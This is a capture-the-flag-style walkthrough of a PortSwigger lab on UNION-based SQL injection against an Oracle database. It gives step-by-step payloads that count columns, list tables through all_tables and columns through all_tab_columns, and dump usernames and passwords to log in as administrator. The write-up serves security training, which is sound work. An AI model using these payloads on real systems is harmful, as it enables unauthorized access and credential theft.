This lab contains an [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

To solve the lab, log in as the `administrator` user.

### Hints
On Oracle databases, every `SELECT` statement must specify a table to select `FROM`. If your `UNION SELECT` attack does not query from a table, you will still need to include the `FROM` keyword followed by a valid table name.

There is a built-in table on Oracle called `dual` which you can use for this purpose. For example: `UNION SELECT 'abc' FROM dual`

On Oracle, you can obtain the same information with slightly different queries.
You can list tables by querying all_tables:
```sql
SELECT * FROM all_tables
```
And you can list columns by querying all_tab_columns:

```sql
SELECT * FROM all_tab_columns WHERE table_name = 'USERS'
```

# Practical
Let's check out how this website works first, let's click on a category
Looks like the only clickable link was categories, we'll have to work with that.
```txt
https://ac601fd91f65d81b80ad52af007c00d1.web-security-academy.net/filter?category=Toys+%26+Games
```
Let's test if the parameter is vulnerable to injection.
```txt
https://ac601fd91f65d81b80ad52af007c00d1.web-security-academy.net/filter?category=Toys+%26+Games'
```
And we received an error, good.
Let's try a UNION attack again.

First, determine the number of columns, we have learned the two methods to determine it, let's use it.
(**Remember to URL encode if payload doesn't work.**)
If we use ORDER BY, we'll get an error when we reach:
```sql
' ORDER BY 3--
```
So it is possible that it only has 2 columns, let's try the second method.
```sql
' UNION SELECT NULL,NULL,NULL--
```
Okay so 3 doesn't, work let's do 2.
2 also doesn't work but remember it's an Oracle database, let's modify our payload a bit.
```sql
' UNION SELECT NULL,NULL FROM all_tables--
```
We use all_tables since Oracle doesn't have information_schema and we don't have a valid table name.

Now let's determine the datatype of our columns.
```sql
' UNION SELECT 'a','b' FROM all_tables--
```
Testing out both they are string columns great. Now we don't need to determine the database version since it is said as Oracle.

Now we need to list tables name.If we're not sure, we can always google for 'Oracle all_tables' and see what we can do.
Let's start crafting our first payload.
```sql
' UNION SELECT table_name,NULL FROM all_tables--
```
And we're presented with tons of tables, let's find one that has users in it.

There's a lot but this one sticks out the most.
```txt
USERS_OTKYGM
```

Now we need to see the columns inside the table, Portswigger has already told us to use all_tab_columns, let's google it and see what options we can use.

We can use table_name,column_name let's craft our payload.
```sql
' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name='USERS_OTKYGM'--
```

Now we get listed two columns which is :
```txt
PASSWORD_LWUSLI
USERNAME_FGJHJF
```

Now we just need to grab them, let's craft our last payload.
```sql
' UNION SELECT USERNAME_FGJHJF,PASSWORD_LWUSLI FROM USERS_OTKYGM--
```
And finally we're listed with the credentials.
Let's login as administrator to solve the lab.
```txt
administrator.af7yxqrvzjfribhycv5x
```
